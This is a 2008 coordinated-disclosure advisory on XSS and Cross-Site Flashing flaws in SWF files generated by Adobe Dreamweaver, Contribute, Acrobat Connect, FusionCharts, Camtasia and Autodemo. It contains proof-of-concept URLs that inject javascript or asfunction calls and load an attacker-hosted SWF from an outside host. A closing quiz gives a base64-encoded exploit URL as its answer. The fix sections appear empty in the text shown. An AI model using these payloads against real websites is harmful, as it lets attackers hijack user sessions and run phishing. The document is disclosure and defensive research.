XSS Vulnerabilities in Common Shockwave Flash Files 

Rich Cannings <rcannings@gmail.com>

January 2, 2008

Version 4 (updated January 24, 2008)

This document is updated at: http://docs.google.com/Doc?docid=ajfxntc4dmsq_14dt57ssdw

Summary

Critical vulnerabilities exist in a large number of widely used web authoring tools that automatically generate Shockwave Flash (SWF) files, such as Adobe (r) Dreamweaver (r), Abobe Contribute (r), Adobe Acrobat (r) Connect (tm) (formerly Macromedia Breeze), InfoSoft FusionCharts, and Techsmith Camtasia. The flaws render websites that host these generated SWF files vulnerable to Cross-Site Scripting (XSS).

This problem is not limited to authoring tools. Autodemo, a popular service provider, used a vulnerable controller SWF in many of their projects.

Simple Google hacking queries reveal that hundreds of thousands of SWFs are vulnerable on the Internet, and a considerable percentage of major Internet sites are affected. We are only reporting XSS vulnerabilities that have been fixed by the vendors.

The Problem

Cross Site Scripting

Cross Site Scripting (XSS) is an attack on users of a web application. If a web application is vulnerable to XSS, and an attacker lures a user of the vulnerable web application to click on a link, then the attacker gains complete control of the user's session in the web application. The attacker can use JavaScript to perform any action on behalf of the user (for example, perform a transaction on an online banking system) or change the way the website appears to the user (for example, perform a phishing attack).

Getting someone to click on a link is easy, just check out this example.

XSS Vulnerabilities in Common SWFs

Unfortunately, XSS vulnerabilities are common too. Many web authoring tools that automatically generate SWFs insert identical and vulnerable ActionScript into all saved SWFs or necessary controller SWFs (think of tools that "save as SWF", "export to SWF", etc.). The vulnerable ActionScript can used by attackers to execute arbitrary JavaScript in the security domain of the website hosting the SWF.

Websites hosting SWFs generated by these products are vulnerable to XSS. Examples include popular government, banking, social networking, and web mail sites.

We were unable to perform an exhaustive review of all authoring tools that generate SWFs. More XSS issues may exist in the products listed below and certainly exist in other applications that save to SWF.

We are only reporting XSS vulnerabilities that have been fixed by the vendors. There are more products vulnerable. We will publish more information when the vendor releases fixes.

Adobe Dreamweaver and Contribute

The "skinName" parameter is accepted by all Flash files produced by the "Insert Flash Video" feature. "skinName" can be used to force victims to load of arbitrary URLs including the "asfunction" protocol handler:

http://www.example.com/FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//

This issue was fixed in the December Flash player release. Furthermore, an attacker can use "skinName" to force victims to load of arbitrary SWFs leading to Cross Site Flashing (XSF) and XSS:

http://www.example.com/FLVPlayer_Progressive.swf?skinName=http://rcannings.googlepages.com/DoKnowEvil

This issue was fixed in January. See Adobe's report and "The Fix" below for mitigations and fixes.

Adobe was contacted on August 8, 2007.

Adobe Acrobat Connect (including Macromedia Breeze)

"main.swf" is the controller file in all Connect/Breeze online presentations. This SWF does not properly validate the "baseurl" parameter; thus causing script injection:

http://www.example.com/main.swf?baseurl=asfunction:getURL,javascript:alert(1)//

This issue was fixed in the December Flash player release. An attacker can also use "baseurl" to force victims to load of arbitrary SWFs leading to Cross Site Flashing (XSF) and XSS:

http://www.example.com/main.swf?baseurl=http://rcannings.googlepages.com/DoKnowEvil.swf%3f

Adobe was contacted on July 31, 2007. See Abobe's report and "The Fix" section below for mitigations and fixes.

InfoSoft FusionCharts

One of the issues found in FusionCharts was that the "dataURL" parameter allows insertion of arbitrary HTML into a "TextArea" instance. This allows attackers to load SWFs from other domains:

http://www.example.com/Example.swf?debugMode=1&dataURL=%27%3E%3Cimg+src%3D%22http%3A//rcannings.googlepages.com/DoKnowEvil.swf%3F.jpg%22%3E

InfoSoft was contacted on September 2, 2007. Fixes for all issues we found were released in late September. Webmasters should consult InfoSoft to properly upgrade their SWFs. See "The Fix" for details.

Techsmith Camtasia

One of the issues found in Camtasia was that the "csPreloader" parameter loads an arbitrary flash file:

http://www.example.com/Example_controller.swf?csPreloader=http://rcannings.googlepages.com/DoKnowEvil.swf%3f

Techsmith was contacted on August 12, 2007. Fixes for all issues was released late September. Webmasters should contact Techsmith to properly upgrade their SWFs. See "The Fix" for details.

Autodemo

Autodemo is a service provider, not an authoring tool. However, like authoring tools they use a common control file in many demos. The "onend" parameter in "control.swf" loads arbitrary URLs including the JavaScript protocol handler:

http://www.example.com/control.swf?onend=javascript:alert(1)//

Autodemo was contacted on August 17, 2007. Autodemo was extremely responsive to our report and quickly fixed the issue in August. Webmasters must update to the latest "control.swf". See "The Fix" for details.

Autodemo is not the only service provider to have XSS in their products. They are just the only service provider we looked at. Readers should be  concerned about other service providers who don't even know their SWFs are vulnerable.

The Fix

All of the measures below should be taken:

Users

Website Owners

Flash Authoring Tools Developers and All Flash Developers

Flash based XSS is not limited to authoring tools. Unfortunately, common design patterns used in many Flash applications introduce XSS issues, so all Flash developers, including Flash authoring tools developers, should do the following:

Credits

First and foremost, we thank Stafano Di Paola of Minded Security and Obscure of EyeonSecurity who thoroughly researched and pioneered every attack we used.

Thanks to Autodemo, Infosoft, and Techsmith for quickly fixing this issue. We also thank the Computer Emergency Response Team for coordinating with the vendors to fix this issue, the Adobe Flash player development teams for including some fixes in the player (we hope to see more in the future), the Adobe Software Security Engineering Team, and the Google Security Team for giving me time to pursue this research and coauthor a book.

Additional Related Links

More technical information:

http://www.kb.cert.org/vuls/id/758769

http://www.kb.cert.org/vuls/id/249337

http://kb.adobe.com/selfservice/viewContent.do?externalId=tn_19604&sliceId=1 (outdated)

http://www.adobe.com/support/security/advisories/apsa07-06.html

http://www.adobe.com/support/security/bulletins/apsb07-20.html

http://www.adobe.com/support/security/bulletins/apsb08-01.html

http://www.adobe.com/support/security/bulletins/apsb08-02.html

http://isecpartners.com/hackingexposedweb20.html

Selected informative articles regarding this problem:

http://jeremiahgrossman.blogspot.com/2008/01/top-ten-web-hacks-of-2007-official.html (got #1 web hack of the year. yay!)

http://jeremiahgrossman.blogspot.com/2008/01/new-flash-xss-technique-thousands-of.html

http://www.heise-security.co.uk/news/101288

http://www.scmagazineus.com/Widespread-Flash-file-flaws-allows-cross-site-scripting-attacks/article/100391/

http://www.theregister.co.uk/2008/01/02/buggy_flash_fix/

http://www.theregister.co.uk/2007/12/21/flash_vulnerability_menace/

http://www.informationweek.com/internet/showArticle.jhtml?articleID=205207936

http://it.slashdot.org/article.pl?sid=07/12/22/2240257

Quiz

Given the ActionScript:

/*

 * Quiz app

 *

 * To compile:

 *   mtasc -swf Quiz.swf -main -header 10:10:10 Quiz.as

 */

class Quiz {

  static function main(mc) {

    getURL("javascript:someFunction('" + escape(_root.userDefined) + "')");

  }

}

Question

Create an URL for Firefox, Internet Explorer, and Safari that will execute JavaScript in the domain hosting Quiz.swf.

Answer (in base64)

aHR0cDovL2V4YW1wbGUuY29tL1F1aXouc3dmP3VzZXJEZWZpbmVkPS

cpO2Z1bmN0aW9uJTIwc29tZUZ1bmN0aW9uKGEpe31hbGVydCgxKS8v

Document History

Version

Date

Change

1

20080102

Initial release

2

20080105

Added more related links

3

20080116

Disclosed more Adobe Connect and Dreamweaver XSF vulnerabilities

Changed host for DoKnowEvil.swf

4

20080124

Added more related links